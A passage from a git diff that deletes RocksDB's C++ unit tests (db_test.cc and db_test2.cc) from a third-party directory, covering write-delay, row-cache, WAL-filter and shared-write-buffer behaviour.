-  for (int i = 0; i < 72; i++) {
-    Put(Key(i), std::string(5000, 'x'));
-    if (i % 10 == 0) {
-      Flush();
-    }
-  }
-  dbfull()->TEST_WaitForCompact();
-  MoveFilesToLevel(2);
-
-  Put(Key(0), "");
-
-  test::SleepingBackgroundTask sleeping_task_low;
-  // Block compactions
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-  sleeping_task_low.WaitUntilSleeping();
-
-  // Create 3 L0 files, making score of L0 to be 3.
-  for (int i = 0; i < 3; i++) {
-    Put(Key(i), std::string(5000, 'x'));
-    Put(Key(100 - i), std::string(5000, 'x'));
-    // Flush the file. File size is around 30KB.
-    Flush();
-  }
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilDone();
-  sleeping_task_low.Reset();
-  dbfull()->TEST_WaitForCompact();
-
-  // Now there is one L1 file but doesn't trigger soft_rate_limit
-  // The L1 file size is around 30KB.
-  ASSERT_EQ(NumTableFilesAtLevel(1), 1);
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  // Only allow one compactin going through.
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "BackgroundCallCompaction:0", [&](void* arg) {
-        // Schedule a sleeping task.
-        sleeping_task_low.Reset();
-        env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask,
-                       &sleeping_task_low, Env::Priority::LOW);
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-  sleeping_task_low.WaitUntilSleeping();
-  // Create 3 L0 files, making score of L0 to be 3
-  for (int i = 0; i < 3; i++) {
-    Put(Key(10 + i), std::string(5000, 'x'));
-    Put(Key(90 - i), std::string(5000, 'x'));
-    // Flush the file. File size is around 30KB.
-    Flush();
-  }
-
-  // Wake up sleep task to enable compaction to run and waits
-  // for it to go to sleep state again to make sure one compaction
-  // goes through.
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilSleeping();
-
-  // Now there is one L1 file (around 60KB) which exceeds 50KB base by 10KB
-  // Given level multiplier 10, estimated pending compaction is around 100KB
-  // doesn't trigger soft_pending_compaction_bytes_limit
-  ASSERT_EQ(NumTableFilesAtLevel(1), 1);
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  // Create 3 L0 files, making score of L0 to be 3, higher than L0.
-  for (int i = 0; i < 3; i++) {
-    Put(Key(20 + i), std::string(5000, 'x'));
-    Put(Key(80 - i), std::string(5000, 'x'));
-    // Flush the file. File size is around 30KB.
-    Flush();
-  }
-  // Wake up sleep task to enable compaction to run and waits
-  // for it to go to sleep state again to make sure one compaction
-  // goes through.
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilSleeping();
-
-  // Now there is one L1 file (around 90KB) which exceeds 50KB base by 40KB
-  // L2 size is 360KB, so the estimated level fanout 4, estimated pending
-  // compaction is around 200KB
-  // triggerring soft_pending_compaction_bytes_limit
-  ASSERT_EQ(NumTableFilesAtLevel(1), 1);
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilSleeping();
-
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  // shrink level base so L2 will hit soft limit easier.
-  ASSERT_OK(dbfull()->SetOptions({
-      {"max_bytes_for_level_base", "5000"},
-  }));
-
-  Put("", "");
-  Flush();
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-
-  sleeping_task_low.WaitUntilSleeping();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilDone();
-}
-
-TEST_F(DBTest, LastWriteBufferDelay) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.write_buffer_size = 100000;
-  options.max_write_buffer_number = 4;
-  options.delayed_write_rate = 20000;
-  options.compression = kNoCompression;
-  options.disable_auto_compactions = true;
-  int kNumKeysPerMemtable = 3;
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(kNumKeysPerMemtable));
-
-  Reopen(options);
-  test::SleepingBackgroundTask sleeping_task;
-  // Block flushes
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task,
-                 Env::Priority::HIGH);
-  sleeping_task.WaitUntilSleeping();
-
-  // Create 3 L0 files, making score of L0 to be 3.
-  for (int i = 0; i < 3; i++) {
-    // Fill one mem table
-    for (int j = 0; j < kNumKeysPerMemtable; j++) {
-      Put(Key(j), "");
-    }
-    ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-  }
-  // Inserting a new entry would create a new mem table, triggering slow down.
-  Put(Key(0), "");
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-
-  sleeping_task.WakeUp();
-  sleeping_task.WaitUntilDone();
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, FailWhenCompressionNotSupportedTest) {
-  CompressionType compressions[] = {kZlibCompression, kBZip2Compression,
-                                    kLZ4Compression, kLZ4HCCompression,
-                                    kXpressCompression};
-  for (auto comp : compressions) {
-    if (!CompressionTypeSupported(comp)) {
-      // not supported, we should fail the Open()
-      Options options = CurrentOptions();
-      options.compression = comp;
-      ASSERT_TRUE(!TryReopen(options).ok());
-      // Try if CreateColumnFamily also fails
-      options.compression = kNoCompression;
-      ASSERT_OK(TryReopen(options));
-      ColumnFamilyOptions cf_options(options);
-      cf_options.compression = comp;
-      ColumnFamilyHandle* handle;
-      ASSERT_TRUE(!db_->CreateColumnFamily(cf_options, "name", &handle).ok());
-    }
-  }
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, RowCache) {
-  Options options = CurrentOptions();
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.row_cache = NewLRUCache(8192);
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put("foo", "bar"));
-  ASSERT_OK(Flush());
-
-  ASSERT_EQ(TestGetTickerCount(options, ROW_CACHE_HIT), 0);
-  ASSERT_EQ(TestGetTickerCount(options, ROW_CACHE_MISS), 0);
-  ASSERT_EQ(Get("foo"), "bar");
-  ASSERT_EQ(TestGetTickerCount(options, ROW_CACHE_HIT), 0);
-  ASSERT_EQ(TestGetTickerCount(options, ROW_CACHE_MISS), 1);
-  ASSERT_EQ(Get("foo"), "bar");
-  ASSERT_EQ(TestGetTickerCount(options, ROW_CACHE_HIT), 1);
-  ASSERT_EQ(TestGetTickerCount(options, ROW_CACHE_MISS), 1);
-}
-
-TEST_F(DBTest, PinnableSliceAndRowCache) {
-  Options options = CurrentOptions();
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.row_cache = NewLRUCache(8192);
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put("foo", "bar"));
-  ASSERT_OK(Flush());
-
-  ASSERT_EQ(Get("foo"), "bar");
-  ASSERT_EQ(
-      reinterpret_cast<LRUCache*>(options.row_cache.get())->TEST_GetLRUSize(),
-      1);
-
-  {
-    PinnableSlice pin_slice;
-    ASSERT_EQ(Get("foo", &pin_slice), Status::OK());
-    ASSERT_EQ(pin_slice.ToString(), "bar");
-    // Entry is already in cache, lookup will remove the element from lru
-    ASSERT_EQ(
-        reinterpret_cast<LRUCache*>(options.row_cache.get())->TEST_GetLRUSize(),
-        0);
-  }
-  // After PinnableSlice destruction element is added back in LRU
-  ASSERT_EQ(
-      reinterpret_cast<LRUCache*>(options.row_cache.get())->TEST_GetLRUSize(),
-      1);
-}
-
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, DeletingOldWalAfterDrop) {
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"Test:AllowFlushes", "DBImpl::BGWorkFlush"},
-       {"DBImpl::BGWorkFlush:done", "Test:WaitForFlush"}});
-  rocksdb::SyncPoint::GetInstance()->ClearTrace();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  Options options = CurrentOptions();
-  options.max_total_wal_size = 8192;
-  options.compression = kNoCompression;
-  options.write_buffer_size = 1 << 20;
-  options.level0_file_num_compaction_trigger = (1 << 30);
-  options.level0_slowdown_writes_trigger = (1 << 30);
-  options.level0_stop_writes_trigger = (1 << 30);
-  options.disable_auto_compactions = true;
-  DestroyAndReopen(options);
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  CreateColumnFamilies({"cf1", "cf2"}, options);
-  ASSERT_OK(Put(0, "key1", DummyString(8192)));
-  ASSERT_OK(Put(0, "key2", DummyString(8192)));
-  // the oldest wal should now be getting_flushed
-  ASSERT_OK(db_->DropColumnFamily(handles_[0]));
-  // all flushes should now do nothing because their CF is dropped
-  TEST_SYNC_POINT("Test:AllowFlushes");
-  TEST_SYNC_POINT("Test:WaitForFlush");
-  uint64_t lognum1 = dbfull()->TEST_LogfileNumber();
-  ASSERT_OK(Put(1, "key3", DummyString(8192)));
-  ASSERT_OK(Put(1, "key4", DummyString(8192)));
-  // new wal should have been created
-  uint64_t lognum2 = dbfull()->TEST_LogfileNumber();
-  EXPECT_GT(lognum2, lognum1);
-}
-
-TEST_F(DBTest, UnsupportedManualSync) {
-  DestroyAndReopen(CurrentOptions());
-  env_->is_wal_sync_thread_safe_.store(false);
-  Status s = db_->SyncWAL();
-  ASSERT_TRUE(s.IsNotSupported());
-}
-
-INSTANTIATE_TEST_CASE_P(DBTestWithParam, DBTestWithParam,
-                        ::testing::Combine(::testing::Values(1, 4),
-                                           ::testing::Bool()));
-
-TEST_F(DBTest, PauseBackgroundWorkTest) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 100000;  // Small write buffer
-  Reopen(options);
-
-  std::vector<port::Thread> threads;
-  std::atomic<bool> done(false);
-  db_->PauseBackgroundWork();
-  threads.emplace_back([&]() {
-    Random rnd(301);
-    for (int i = 0; i < 10000; ++i) {
-      Put(RandomString(&rnd, 10), RandomString(&rnd, 10));
-    }
-    done.store(true);
-  });
-  env_->SleepForMicroseconds(200000);
-  // make sure the thread is not done
-  ASSERT_FALSE(done.load());
-  db_->ContinueBackgroundWork();
-  for (auto& t : threads) {
-    t.join();
-  }
-  // now it's done
-  ASSERT_TRUE(done.load());
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_test2.cc b/thirdparty/rocksdb/db/db_test2.cc
deleted file mode 100644
index 30afd5a..0000000
--- a/thirdparty/rocksdb/db/db_test2.cc
+++ /dev/null
@@ -1,2340 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include <atomic>
-#include <cstdlib>
-#include <functional>
-
-#include "db/db_test_util.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/persistent_cache.h"
-#include "rocksdb/wal_filter.h"
-
-namespace rocksdb {
-
-class DBTest2 : public DBTestBase {
- public:
-  DBTest2() : DBTestBase("/db_test2") {}
-};
-
-class PrefixFullBloomWithReverseComparator
-    : public DBTestBase,
-      public ::testing::WithParamInterface<bool> {
- public:
-  PrefixFullBloomWithReverseComparator()
-      : DBTestBase("/prefix_bloom_reverse") {}
-  virtual void SetUp() override { if_cache_filter_ = GetParam(); }
-  bool if_cache_filter_;
-};
-
-TEST_P(PrefixFullBloomWithReverseComparator,
-       PrefixFullBloomWithReverseComparator) {
-  Options options = last_options_;
-  options.comparator = ReverseBytewiseComparator();
-  options.prefix_extractor.reset(NewCappedPrefixTransform(3));
-  options.statistics = rocksdb::CreateDBStatistics();
-  BlockBasedTableOptions bbto;
-  if (if_cache_filter_) {
-    bbto.no_block_cache = false;
-    bbto.cache_index_and_filter_blocks = true;
-    bbto.block_cache = NewLRUCache(1);
-  }
-  bbto.filter_policy.reset(NewBloomFilterPolicy(10, false));
-  bbto.whole_key_filtering = false;
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-  DestroyAndReopen(options);
-
-  ASSERT_OK(dbfull()->Put(WriteOptions(), "bar123", "foo"));
-  ASSERT_OK(dbfull()->Put(WriteOptions(), "bar234", "foo2"));
-  ASSERT_OK(dbfull()->Put(WriteOptions(), "foo123", "foo3"));
-
-  dbfull()->Flush(FlushOptions());
-
-  if (bbto.block_cache) {
-    bbto.block_cache->EraseUnRefEntries();
-  }
-
-  unique_ptr<Iterator> iter(db_->NewIterator(ReadOptions()));
-  iter->Seek("bar345");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("bar234", iter->key().ToString());
-  ASSERT_EQ("foo2", iter->value().ToString());
-  iter->Next();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("bar123", iter->key().ToString());
-  ASSERT_EQ("foo", iter->value().ToString());
-
-  iter->Seek("foo234");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("foo123", iter->key().ToString());
-  ASSERT_EQ("foo3", iter->value().ToString());
-
-  iter->Seek("bar");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(!iter->Valid());
-}
-
-INSTANTIATE_TEST_CASE_P(PrefixFullBloomWithReverseComparator,
-                        PrefixFullBloomWithReverseComparator, testing::Bool());
-
-TEST_F(DBTest2, IteratorPropertyVersionNumber) {
-  Put("", "");
-  Iterator* iter1 = db_->NewIterator(ReadOptions());
-  std::string prop_value;
-  ASSERT_OK(
-      iter1->GetProperty("rocksdb.iterator.super-version-number", &prop_value));
-  uint64_t version_number1 =
-      static_cast<uint64_t>(std::atoi(prop_value.c_str()));
-
-  Put("", "");
-  Flush();
-
-  Iterator* iter2 = db_->NewIterator(ReadOptions());
-  ASSERT_OK(
-      iter2->GetProperty("rocksdb.iterator.super-version-number", &prop_value));
-  uint64_t version_number2 =
-      static_cast<uint64_t>(std::atoi(prop_value.c_str()));
-
-  ASSERT_GT(version_number2, version_number1);
-
-  Put("", "");
-
-  Iterator* iter3 = db_->NewIterator(ReadOptions());
-  ASSERT_OK(
-      iter3->GetProperty("rocksdb.iterator.super-version-number", &prop_value));
-  uint64_t version_number3 =
-      static_cast<uint64_t>(std::atoi(prop_value.c_str()));
-
-  ASSERT_EQ(version_number2, version_number3);
-
-  iter1->SeekToFirst();
-  ASSERT_OK(
-      iter1->GetProperty("rocksdb.iterator.super-version-number", &prop_value));
-  uint64_t version_number1_new =
-      static_cast<uint64_t>(std::atoi(prop_value.c_str()));
-  ASSERT_EQ(version_number1, version_number1_new);
-
-  delete iter1;
-  delete iter2;
-  delete iter3;
-}
-
-TEST_F(DBTest2, CacheIndexAndFilterWithDBRestart) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  BlockBasedTableOptions table_options;
-  table_options.cache_index_and_filter_blocks = true;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(20));
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  Put(1, "a", "begin");
-  Put(1, "z", "end");
-  ASSERT_OK(Flush(1));
-  TryReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  std::string value;
-  value = Get(1, "a");
-}
-
-TEST_F(DBTest2, MaxSuccessiveMergesChangeWithDBRecovery) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.max_successive_merges = 3;
-  options.merge_operator = MergeOperators::CreatePutOperator();
-  options.disable_auto_compactions = true;
-  DestroyAndReopen(options);
-  Put("poi", "Finch");
-  db_->Merge(WriteOptions(), "poi", "Reese");
-  db_->Merge(WriteOptions(), "poi", "Shaw");
-  db_->Merge(WriteOptions(), "poi", "Root");
-  options.max_successive_merges = 2;
-  Reopen(options);
-}
-
-#ifndef ROCKSDB_LITE
-class DBTestSharedWriteBufferAcrossCFs
-    : public DBTestBase,
-      public testing::WithParamInterface<std::tuple<bool, bool>> {
- public:
-  DBTestSharedWriteBufferAcrossCFs()
-      : DBTestBase("/db_test_shared_write_buffer") {}
-  void SetUp() override {
-    use_old_interface_ = std::get<0>(GetParam());
-    cost_cache_ = std::get<1>(GetParam());
-  }
-  bool use_old_interface_;
-  bool cost_cache_;
-};
-
-TEST_P(DBTestSharedWriteBufferAcrossCFs, SharedWriteBufferAcrossCFs) {
-  Options options = CurrentOptions();
-  options.arena_block_size = 4096;
-
-  // Avoid undeterministic value by malloc_usable_size();
-  // Force arena block size to 1
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "Arena::Arena:0", [&](void* arg) {
-        size_t* block_size = static_cast<size_t*>(arg);
-        *block_size = 1;
-      });
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "Arena::AllocateNewBlock:0", [&](void* arg) {
-        std::pair<size_t*, size_t*>* pair =
-            static_cast<std::pair<size_t*, size_t*>*>(arg);
-        *std::get<0>(*pair) = *std::get<1>(*pair);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // The total soft write buffer size is about 105000
-  std::shared_ptr<Cache> cache = NewLRUCache(4 * 1024 * 1024, 2);
-  ASSERT_LT(cache->GetUsage(), 1024 * 1024);
-
-  if (use_old_interface_) {
-    options.db_write_buffer_size = 120000;  // this is the real limit
-  } else if (!cost_cache_) {
-    options.write_buffer_manager.reset(new WriteBufferManager(114285));
-  } else {
-    options.write_buffer_manager.reset(new WriteBufferManager(114285, cache));
-  }
-  options.write_buffer_size = 500000;  // this is never hit
-  CreateAndReopenWithCF({"pikachu", "dobrynia", "nikitich"}, options);
-
-  WriteOptions wo;
-  wo.disableWAL = true;
-
-  std::function<void()> wait_flush = [&]() {
-    dbfull()->TEST_WaitForFlushMemTable(handles_[0]);
-    dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-    dbfull()->TEST_WaitForFlushMemTable(handles_[2]);
-    dbfull()->TEST_WaitForFlushMemTable(handles_[3]);
-  };
-
-  // Create some data and flush "default" and "nikitich" so that they
-  // are newer CFs created.
-  ASSERT_OK(Put(3, Key(1), DummyString(1), wo));
-  Flush(3);
-  ASSERT_OK(Put(3, Key(1), DummyString(1), wo));
-  ASSERT_OK(Put(0, Key(1), DummyString(1), wo));
-  Flush(0);
-  ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default"),
-            static_cast<uint64_t>(1));
-  ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "nikitich"),
-            static_cast<uint64_t>(1));
-
-  ASSERT_OK(Put(3, Key(1), DummyString(30000), wo));
-  if (cost_cache_) {
-    ASSERT_GE(cache->GetUsage(), 1024 * 1024);
-    ASSERT_LE(cache->GetUsage(), 2 * 1024 * 1024);
-  }
-  wait_flush();
-  ASSERT_OK(Put(0, Key(1), DummyString(60000), wo));
-  if (cost_cache_) {
-    ASSERT_GE(cache->GetUsage(), 1024 * 1024);
-    ASSERT_LE(cache->GetUsage(), 2 * 1024 * 1024);
-  }
-  wait_flush();
-  ASSERT_OK(Put(2, Key(1), DummyString(1), wo));
-  // No flush should trigger
-  wait_flush();
-  {
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "pikachu"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "dobrynia"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "nikitich"),
-              static_cast<uint64_t>(1));
-  }
-
-  // Trigger a flush. Flushing "nikitich".
-  ASSERT_OK(Put(3, Key(2), DummyString(30000), wo));
-  wait_flush();
-  ASSERT_OK(Put(0, Key(1), DummyString(1), wo));
-  wait_flush();
-  {
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "pikachu"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "dobrynia"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "nikitich"),
-              static_cast<uint64_t>(2));
-  }
-
-  // Without hitting the threshold, no flush should trigger.
-  ASSERT_OK(Put(2, Key(1), DummyString(30000), wo));
-  wait_flush();
-  ASSERT_OK(Put(2, Key(1), DummyString(1), wo));
-  wait_flush();
-  ASSERT_OK(Put(2, Key(1), DummyString(1), wo));
-  wait_flush();
-  {
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "pikachu"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "dobrynia"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "nikitich"),
-              static_cast<uint64_t>(2));
-  }
-
-  // Hit the write buffer limit again. "default"
-  // will have been flushed.
-  ASSERT_OK(Put(2, Key(2), DummyString(10000), wo));
-  wait_flush();
-  ASSERT_OK(Put(3, Key(1), DummyString(1), wo));
-  wait_flush();
-  ASSERT_OK(Put(0, Key(1), DummyString(1), wo));
-  wait_flush();
-  ASSERT_OK(Put(0, Key(1), DummyString(1), wo));
-  wait_flush();
-  ASSERT_OK(Put(0, Key(1), DummyString(1), wo));
-  wait_flush();
-  {
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default"),
-              static_cast<uint64_t>(2));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "pikachu"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "dobrynia"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "nikitich"),
-              static_cast<uint64_t>(2));
-  }
-
-  // Trigger another flush. This time "dobrynia". "pikachu" should not
-  // be flushed, althrough it was never flushed.
-  ASSERT_OK(Put(1, Key(1), DummyString(1), wo));
-  wait_flush();
-  ASSERT_OK(Put(2, Key(1), DummyString(80000), wo));
-  wait_flush();
-  ASSERT_OK(Put(1, Key(1), DummyString(1), wo));
-  wait_flush();
-  ASSERT_OK(Put(2, Key(1), DummyString(1), wo));
-  wait_flush();
-
-  {
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default"),
-              static_cast<uint64_t>(2));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "pikachu"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "dobrynia"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "nikitich"),
-              static_cast<uint64_t>(2));
-  }
-  if (cost_cache_) {
-    ASSERT_GE(cache->GetUsage(), 1024 * 1024);
-    Close();
-    options.write_buffer_manager.reset();
-    ASSERT_LT(cache->GetUsage(), 1024 * 1024);
-  }
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-INSTANTIATE_TEST_CASE_P(DBTestSharedWriteBufferAcrossCFs,
-                        DBTestSharedWriteBufferAcrossCFs,
-                        ::testing::Values(std::make_tuple(true, false),
-                                          std::make_tuple(false, false),
-                                          std::make_tuple(false, true)));
-
-TEST_F(DBTest2, SharedWriteBufferLimitAcrossDB) {
-  std::string dbname2 = test::TmpDir(env_) + "/db_shared_wb_db2";
-  Options options = CurrentOptions();
-  options.arena_block_size = 4096;
-  // Avoid undeterministic value by malloc_usable_size();
-  // Force arena block size to 1
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "Arena::Arena:0", [&](void* arg) {
-        size_t* block_size = static_cast<size_t*>(arg);
-        *block_size = 1;
-      });
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "Arena::AllocateNewBlock:0", [&](void* arg) {
-        std::pair<size_t*, size_t*>* pair =
-            static_cast<std::pair<size_t*, size_t*>*>(arg);
-        *std::get<0>(*pair) = *std::get<1>(*pair);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  options.write_buffer_size = 500000;  // this is never hit
-  // Use a write buffer total size so that the soft limit is about
-  // 105000.
-  options.write_buffer_manager.reset(new WriteBufferManager(120000));
-  CreateAndReopenWithCF({"cf1", "cf2"}, options);
-
-  ASSERT_OK(DestroyDB(dbname2, options));
-  DB* db2 = nullptr;
-  ASSERT_OK(DB::Open(options, dbname2, &db2));
-
-  WriteOptions wo;
-  wo.disableWAL = true;
-
-  std::function<void()> wait_flush = [&]() {
-    dbfull()->TEST_WaitForFlushMemTable(handles_[0]);
-    dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-    dbfull()->TEST_WaitForFlushMemTable(handles_[2]);
-    static_cast<DBImpl*>(db2)->TEST_WaitForFlushMemTable();
-  };
-
-  // Trigger a flush on cf2
-  ASSERT_OK(Put(2, Key(1), DummyString(70000), wo));
-  wait_flush();
-  ASSERT_OK(Put(0, Key(1), DummyString(20000), wo));
-  wait_flush();
-
-  // Insert to DB2
-  ASSERT_OK(db2->Put(wo, Key(2), DummyString(20000)));
-  wait_flush();
-
-  ASSERT_OK(Put(2, Key(1), DummyString(1), wo));
-  wait_flush();
-  static_cast<DBImpl*>(db2)->TEST_WaitForFlushMemTable();
-  {
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default") +
-                  GetNumberOfSstFilesForColumnFamily(db_, "cf1") +
-                  GetNumberOfSstFilesForColumnFamily(db_, "cf2"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db2, "default"),
-              static_cast<uint64_t>(0));
-  }
-
-  // Triggering to flush another CF in DB1
-  ASSERT_OK(db2->Put(wo, Key(2), DummyString(70000)));
-  wait_flush();
-  ASSERT_OK(Put(2, Key(1), DummyString(1), wo));
-  wait_flush();
-  {
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "cf1"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "cf2"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db2, "default"),
-              static_cast<uint64_t>(0));
-  }
-
-  // Triggering flush in DB2.
-  ASSERT_OK(db2->Put(wo, Key(3), DummyString(40000)));
-  wait_flush();
-  ASSERT_OK(db2->Put(wo, Key(1), DummyString(1)));
-  wait_flush();
-  static_cast<DBImpl*>(db2)->TEST_WaitForFlushMemTable();
-  {
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "cf1"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "cf2"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db2, "default"),
-              static_cast<uint64_t>(1));
-  }
-
-  delete db2;
-  ASSERT_OK(DestroyDB(dbname2, options));
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-namespace {
-  void ValidateKeyExistence(DB* db, const std::vector<Slice>& keys_must_exist,
-    const std::vector<Slice>& keys_must_not_exist) {
-    // Ensure that expected keys exist
-    std::vector<std::string> values;
-    if (keys_must_exist.size() > 0) {
-      std::vector<Status> status_list =
-        db->MultiGet(ReadOptions(), keys_must_exist, &values);
-      for (size_t i = 0; i < keys_must_exist.size(); i++) {
-        ASSERT_OK(status_list[i]);
-      }
-    }
-
-    // Ensure that given keys don't exist
-    if (keys_must_not_exist.size() > 0) {
-      std::vector<Status> status_list =
-        db->MultiGet(ReadOptions(), keys_must_not_exist, &values);
-      for (size_t i = 0; i < keys_must_not_exist.size(); i++) {
-        ASSERT_TRUE(status_list[i].IsNotFound());
-      }
-    }
-  }
-
-}  // namespace
-
-TEST_F(DBTest2, WalFilterTest) {
-  class TestWalFilter : public WalFilter {
-  private:
-    // Processing option that is requested to be applied at the given index
-    WalFilter::WalProcessingOption wal_processing_option_;
-    // Index at which to apply wal_processing_option_
-    // At other indexes default wal_processing_option::kContinueProcessing is
-    // returned.
-    size_t apply_option_at_record_index_;
-    // Current record index, incremented with each record encountered.
-    size_t current_record_index_;
-
-  public:
-    TestWalFilter(WalFilter::WalProcessingOption wal_processing_option,
-      size_t apply_option_for_record_index)
-      : wal_processing_option_(wal_processing_option),
-      apply_option_at_record_index_(apply_option_for_record_index),
-      current_record_index_(0) {}
-
-    virtual WalProcessingOption LogRecord(const WriteBatch& batch,
-      WriteBatch* new_batch,
-      bool* batch_changed) const override {
-      WalFilter::WalProcessingOption option_to_return;
-
-      if (current_record_index_ == apply_option_at_record_index_) {
-        option_to_return = wal_processing_option_;
-      }
-      else {
